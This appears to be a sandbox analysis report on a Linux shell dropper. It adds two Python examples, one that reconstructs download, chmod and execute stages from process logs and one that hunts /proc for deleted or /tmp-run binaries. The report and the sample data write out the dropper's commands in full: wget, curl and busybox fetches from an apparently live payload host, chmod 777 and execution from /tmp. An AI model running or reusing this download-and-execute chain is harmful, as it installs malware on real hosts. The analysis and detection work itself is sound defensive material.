Analysis
max time kernel: 149s
max time network: 155s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 25/10/2024, 01:12
Static task: static1
Behavioral task: behavioral1
  Sample: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3 (the run reported on this page: platform debian-9_mips, big-endian MIPS)
  Sample: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
  Resource: debian9-mipsel-20240418-en
General
Target: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Size: 10KB
MD5: f36cbd463f4b21236b1338c03dbfd8e4
SHA1: 22a27ede29be8ec1c42b17c43a162e2d9ab3a265
SHA256: 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
SHA512: 74f54cf55aaa5b35951ff883a64e3a584f03c6952de36b92558993d20093f641c9f3aab6c7d659cef4c8c0cf84b8762f370d1ed768b48d717f130bd7f6f91e9a
SSDEEP: 96:Yqin/wN/wN/w7vQ4vxL1VMQWGmXr87XnNHNbNk3WKJUIEBL7XMWxWpWhC+kacagk:C6eET5AQtxk3vJ+tqkotxk3vb36eETGB
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 12 IoCs)
Adversaries may modify file or directory permissions to evade defenses. Here every dropped binary is made world-readable, world-writable and world-executable (mode 777) before it is run.
  pid  process
  732  chmod
  740  chmod
  750  chmod
  795  chmod
  809  chmod
  816  chmod
  829  chmod
  854  chmod
  867  chmod
  874  chmod
  881  chmod
  889  chmod

Executes dropped EXE (12 IoCs)
Each payload is executed from /tmp by its own download name.
  pid  ioc (process)
  733  /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
  741  /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
  751  /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
  797  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
  810  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
  817  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
  830  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
  855  /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
  868  /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
  875  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
  882  /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
  890  /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc

Reads runtime system information (12 IoCs)
  description: File opened for reading
  ioc: /proc/sys/crypto/fips_enabled
  process: curl (once per curl invocation, 12 in total)
This is a kernel FIPS-mode check made by curl's crypto library at start-up; it reflects the tooling the script calls rather than behaviour unique to this sample, so it should not be given weight on its own.

System Network Configuration Discovery (1 TTP, 37 IoCs)
Adversaries may gather information about the network configuration of a system. The signature fires on every fetch attempt, i.e. on each of the three downloaders the script tries per payload.
  wget (13):    709, 736, 743, 753, 803, 812, 819, 834, 859, 870, 877, 884, 892
  curl (12):    720, 737, 744, 778, 806, 813, 820, 841, 864, 871, 878, 885
  busybox (12): 731, 739, 749, 788, 808, 815, 825, 851, 866, 873, 880, 888

Writes file to tmp directory (12 IoCs)
Malware often drops required files in the /tmp directory. Only the curl fetches (curl -O saves under the URL's basename) are credited with the write; the wget and busybox wget attempts have no write IoC in this run.
  description: File opened for modification, process: curl
  /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
  /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
  /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
  /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
  /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
  /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
  /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
  /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
  /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
  /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
  /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
  /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc
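The signatures above are individually weak (chmod, a download, an exec from /tmp), but together they form a recognisable chain per dropped file: fetch, chmod, execute, remove. The script below is an added example, not part of the sandbox report or of any tooling it uses: it takes a process list in a simple "pid ppid command" text form (an assumed format, with sample lines constructed to mirror this report) and groups the steps by dropped-file name, so that it can report which stages ran to completion, which were only fetched, and which hosts and URLs served the payloads. It recognises wget, curl and busybox wget as fetchers, which generalises the three downloaders the report shows.

```python
import re
from urllib.parse import urlparse

# Constructed sample, modelled on the process tree in this report (one line per
# process: pid, ppid, command line).  The format is an assumption of this
# example, not the sandbox's export format.
SAMPLE_EVENTS = """\
700 1   /bin/sh /tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
704 700 rm bins.sh
709 700 wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
720 700 curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
731 700 /bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
732 700 chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
733 700 ./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
735 700 rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
736 700 wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
737 700 curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
740 700 chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
741 700 ./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
742 700 rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
892 700 wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5
"""

EVENT_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<cmd>.+)$")
URL_RE = re.compile(r"^https?://\S+$")
FETCHERS = {"wget", "curl"}


def parse_events(text):
    """Turn the text form above into a list of {pid, ppid, cmd} dicts."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append({"pid": int(m["pid"]), "ppid": int(m["ppid"]), "cmd": m["cmd"]})
    return events


def classify(cmd):
    """Map one command line to (action, dropped-file name, detail), or None."""
    argv = cmd.split()
    tool = argv[0].rsplit("/", 1)[-1]            # /bin/busybox -> busybox
    if tool == "busybox" and len(argv) > 1:      # busybox applets: "busybox wget ..."
        tool = "busybox " + argv[1]
    url = next((a for a in argv if URL_RE.match(a)), None)
    if url and tool.split()[-1] in FETCHERS:
        # wget and curl -O both save under the URL's basename
        name = urlparse(url).path.rsplit("/", 1)[-1]
        return "fetch", name, {"tool": tool, "url": url}
    if tool == "chmod" and len(argv) >= 3:
        return "chmod", argv[-1], {"mode": argv[1]}
    if tool == "rm" and len(argv) >= 2:
        return "rm", argv[-1], {}
    if argv[0].startswith("./"):
        return "exec", argv[0][2:], {}
    return None


def analyze(events):
    """Group the per-file steps and decide which stages ran to completion."""
    stages, order = {}, []
    for ev in events:
        hit = classify(ev["cmd"])
        if hit is None:
            continue
        action, name, detail = hit
        st = stages.get(name)
        if st is None:
            st = stages[name] = {"parent": ev["ppid"], "fetchers": [], "urls": [],
                                 "chmod": None, "exec_pid": None, "removed": False}
            order.append(name)
        if action == "fetch":
            st["fetchers"].append(detail["tool"])
            if detail["url"] not in st["urls"]:
                st["urls"].append(detail["url"])
        elif action == "chmod":
            st["chmod"] = detail["mode"]
        elif action == "exec":
            st["exec_pid"] = ev["pid"]
        elif action == "rm":
            st["removed"] = True
    complete = [n for n in order
                if stages[n]["urls"] and stages[n]["chmod"] and stages[n]["exec_pid"]]
    incomplete = [n for n in order if stages[n]["urls"] and n not in complete]
    urls = sorted(u for st in stages.values() for u in st["urls"])
    return {
        "stages": stages,
        "complete_stages": complete,       # fetched, chmod'ed and executed
        "incomplete_stages": incomplete,   # fetched but never run (e.g. the run ended)
        "urls": urls,
        "c2_hosts": sorted({urlparse(u).hostname for u in urls}),
    }


if __name__ == "__main__":
    result = analyze(parse_events(SAMPLE_EVENTS))
    print("payload hosts:", ", ".join(result["c2_hosts"]))
    for name in result["complete_stages"]:
        st = result["stages"][name]
        print(f"stage {name}: fetched via {st['fetchers']}, chmod {st['chmod']}, "
              f"executed as pid {st['exec_pid']}, removed={st['removed']}")
    print("fetched but not executed:", result["incomplete_stages"])
```

The grouping key is the dropped file's name rather than the pid, because in this family every step is a separate short-lived child of the same shell, so parent/child links alone would not tie a download to the later chmod and exec. A fetch with no following chmod/exec (the last entry here) is reported separately: in a sandbox it usually means the run timed out, on a real host it may mean the download failed.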
Processes
The submitted script (PID 700, depth 1) first removes a file named bins.sh and then works through a list of payload names. For every name it runs the same six direct children (depth 2): the file is requested three times with different downloaders (wget, curl -O and busybox wget, so the stage succeeds on a host that has only one of them), made mode 777, executed from /tmp, and deleted. The command lines are identical apart from the name:

  /usr/bin/wget   wget http://conn.masjesu.zip/bins/<name>            signature: System Network Configuration Discovery
  /usr/bin/curl   curl -O http://conn.masjesu.zip/bins/<name>         signatures: Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  /bin/busybox    /bin/busybox wget http://conn.masjesu.zip/bins/<name>  signature: System Network Configuration Discovery
  /bin/chmod      chmod 777 <name>                                    signature: File and Directory Permissions Modification
  /tmp/<name>     ./<name>                                            signature: Executes dropped EXE
  /bin/rm         rm <name>                                           no signature

PID 700  /tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
  PID 704  /bin/rm bins.sh

  name                                wget  curl  busybox  chmod  exec  rm
  3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH   709   720    731     732   733   735
  q8by6B3GMmnW2fqzokCod3DStJogu7sm1h   736   737    739     740   741   742
  eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM   743   744    749     750   751   752
  Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd   753   778    788     795   797   801
  SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM   803   806    808     809   810   811
  EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI   812   813    815     816   817   818
  v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG   819   820    825     829   830   833
  GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B   834   841    851     854   855   858
  GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg   859   864    866     867   868   869
  KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj   870   871    873     874   875   876
  IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy   877   878    880     881   882   883
  IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc   884   885    888     889   890   891
  XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5   892   -      -       -     -     -

The wget for XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 (PID 892) is the last process in the recorded tree; no further steps for it, and no further names, were captured within the run's time limit.
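Every stage in the tree ends with rm of the binary that was just started, so on an infected host the payload is gone from /tmp while its process is still running. The Linux kernel keeps the unlinked inode alive for as long as it is mapped, and /proc/<pid>/exe then reads "<path> (deleted)", which is exactly the hunt this pattern calls for. The script below is an added example, not part of the report or of the sandbox: it walks a /proc-style tree, reads each exe link and flags processes whose binary was unlinked or lives in a world-writable temp directory. To run offline it builds a constructed stand-in for /proc in a temporary directory (the pids and names mirror this report, nothing is executed); point scan_proc() at the real /proc to use it on a host.

```python
import os
import tempfile

# Directories a dropped payload is typically written to and executed from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED_SUFFIX = " (deleted)"   # what readlink(/proc/<pid>/exe) returns after unlink


def classify_exe(target):
    """Reasons why a /proc/<pid>/exe link target looks like a dropped payload."""
    reasons = []
    if target.endswith(DELETED_SUFFIX):      # binary was removed after exec
        reasons.append("executable unlinked while running")
        target = target[:-len(DELETED_SUFFIX)]
    if target.startswith(SUSPICIOUS_DIRS):
        reasons.append("executable lives in a world-writable temp directory")
    return reasons


def scan_proc(proc_root="/proc"):
    """Walk a /proc-style tree and return findings sorted by pid."""
    findings = []
    for pid in sorted(int(e) for e in os.listdir(proc_root) if e.isdigit()):
        try:
            target = os.readlink(os.path.join(proc_root, str(pid), "exe"))
        except OSError:
            continue  # kernel thread, process already gone, or no ptrace permission
        reasons = classify_exe(target)
        if reasons:
            findings.append({"pid": pid, "exe": target, "reasons": reasons})
    return findings


def build_fake_proc():
    """Constructed stand-in for /proc so the example runs offline.

    The pids and file names mirror the report above; the exe symlinks are
    dangling on purpose, no payload is present or executed."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    fake_exe_links = {
        "1": "/sbin/init",
        "733": "/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH" + DELETED_SUFFIX,
        "741": "/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h",
        "812": "/usr/bin/wget",
    }
    for pid, target in fake_exe_links.items():
        os.makedirs(os.path.join(root, pid))
        os.symlink(target, os.path.join(root, pid, "exe"))
    os.makedirs(os.path.join(root, "self"))   # non-numeric entry, skipped by scan_proc
    return root


if __name__ == "__main__":
    for f in scan_proc(build_fake_proc()):
        print(f"pid {f['pid']}: {f['exe']} -> {'; '.join(f['reasons'])}")
```

On a live host run it as root: reading another user's /proc/<pid>/exe requires ptrace access, and the except branch silently skips what it cannot read. While the flagged process is alive, `cp /proc/<pid>/exe /case/payload.bin` recovers the deleted binary for hashing and static analysis; once the process exits the inode is freed and only the sandbox's hashes remain.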
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97